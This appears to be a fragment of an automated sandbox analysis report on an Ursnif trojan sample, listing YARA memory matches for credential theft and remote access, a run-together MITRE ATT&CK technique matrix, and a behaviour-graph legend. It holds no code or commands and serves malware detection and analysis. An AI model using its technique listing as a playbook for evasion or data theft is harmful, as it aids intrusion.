            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation121Path InterceptionProcess Injection1Masquerading11OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion4LSASS MemorySecurity Software Discovery24Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerVirtualization/Sandbox Evasion4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting121NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Information Discovery24SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet